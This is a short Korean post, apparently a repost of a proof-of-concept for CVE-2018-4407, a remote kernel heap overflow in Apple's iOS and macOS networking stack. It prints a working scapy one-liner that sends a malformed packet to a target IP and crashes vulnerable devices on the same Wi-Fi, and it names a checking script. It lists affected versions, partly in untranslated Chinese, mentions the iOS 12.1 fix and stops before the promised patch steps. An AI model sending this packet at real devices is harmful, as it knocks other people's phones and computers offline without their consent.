
iOS 12 / OS X 원격 커널 힙 오버플로우 (CVE-2018-4407) POC
*iOS 12 / OS X 원격 커널 힙 오버플로(CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
또는 스크립트 사용
python check_icmp_dos.py 127.0.0.1
이 취약점을 통해 공격자는 동일한 Wi-Fi 네트워크에 접속하기만 하면, 아무것도 모르는 다른 사용자에게 악성 패킷을 전송하여 모든 Mac 또는 iOS 기기의 충돌과 재시작을 유발할 수 있습니다. 이 취약점은 시스템 네트워크 핵심 코드에 존재하므로 어떤 안티바이러스 소프트웨어로도 방어할 수 없습니다.
다음 운영 체제를 실행하는 기기는 취약합니다:
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
현재 Apple은 iOS 12.1 버전 업데이트를 출시하여 이 취약점을 수정했습니다. 사용자는 시스템 버전을 신속히 확인하고, 영향을 받은 경우 즉시 패치 조치를 취할 것을 권장합니다. 취약점 패치 조치는 다음과 같습니다: